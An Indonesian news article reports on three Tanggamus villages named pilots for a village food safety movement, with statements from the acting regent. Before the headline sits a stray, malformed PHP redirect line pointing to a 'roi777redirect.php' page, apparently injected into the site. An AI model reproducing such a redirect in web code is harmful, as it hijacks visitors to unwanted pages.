header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); BPPOM Bina 3 Pekon Laksanakan Gerakan Keamanan Pangan Desa Kabupaten Tanggamus -
BPPOM Bina 3 Pekon Laksanakan Gerakan Keamanan Pangan Desa Kabupaten Tanggamus

BUKA REORIENTASI KELEMBAGAAN PANGAN: Asisten 2 Setda Tanggamus Ir. F.B. Karjiono mewakili Pj. Bupati Tanggamus Ir. Zainal Abidin membuka Reorientasi Kelembagaan Pangan Desa Kabupaten Tanggamus di Gisting, tadi (23/3) siang. (Foto: AYP) 

TRANSLAMPUNG.COM, TANGGAMUS – Tiga pekon di Kabupaten Tanggamus dicanangkan menjadi percontohan Gerakan Keamanan Pangan Desa Kabupaten Tanggamus. Yaitu Pekon Bangunrejo Kecamatan Semaka, Pekon Gisting Bawah Kecamatan Gisting, dan Pekon Tegalbinangun Kecamatan Sumberejo. Atas pencanangan tersebut, Penjabat Bupati Tanggamus Ir. Zainal Abidin menginstruksikan agar Organisasi Perangkat Daerah terkait saling bersinergi.

Hal itu disampaikan Zainal Abidin melalui sambutan tertulisnya yang dibacakan Asisten 2 Setda Tanggamus Ir. F.B. Karjiono, saat menghadiri Reorientasi Kelembagaan Pangan Desa Kabupaten Tanggamus, tadi (23/3) siang. Zainal Abidin melalui Karjiono mengatakan, pangan merupakan kebutuhan dasar yang merupakan suatu keharusan dalam suatu aspek kehidupan.

Gerakan Keamanan Pangan Desa sangat penting dilaksanakan, sebab bertujuan mengintervensi seluruh individu, para pedagang kreatif lapangan, bahkan pebisnis retail/warung di desa masing-masing. Sehingga dapat menghindarkan masyarakat dari penggunaan bahan makanan berbahaya, yang dapat menimbulkan keracunan.

Pangan, kata Zainal, juga merupakan komponen dasar bagi manusia berkualitas yang berperan menjaga stabilitas ekonomi, sosial, dan politik. Keamanan pangan merupakan kondisis upaya untuk mencegah pencemaran pangan dari aspek fisik, biologis, serta barang lainnya.

“Tercemarnya bahan pangan, dapat mengganggu kehidupan manusia. Oleh karena itu, keamanan pangan harus dibangun dari individu, keluarga, dan elemen masyarakat secara luas,” tegas Zainal melalui Karjiono.

Demi suksesnya gerakan itu, Pj. Bupati Tanggamus menegaskan pada seluruh OPD terkait untuk ikut berperan aktif sesuai dengan tugas dan fungsinya. Yaitu dengan bersinergi melaksanakan program Gerakan Keamanan Pangan Desa Kabupaten Tanggamus. Dengan kegiatan itu yang diawali di tiga pekon itu, diharapkan bisa dilanjutkan ke seluruh pekon/kelurahan.

“Karena dengan kegiatan seperti ini, masyarakat dapat ‘terprovokasi’ untuk tumbuh sehat dan berkembang dengan baik. Saya mengucapkan terimakasih kepada Balai Besar Pengawas Obat dan Makanan (BBPOM) Bandarlampung yang melaksanakan kegiatan ini. Sehingga ke depan bisa mewujudkan perubahan pola pikir masyarakat, tentang bagaimana pentingnya pangan dari segi higienitasnya untuk menumbuhkan masyarakat, sehat, cerdas, bermatabat, agamis, dan menjadi negara yang kuat,” tandas Zainal. (ayp)

News Reporter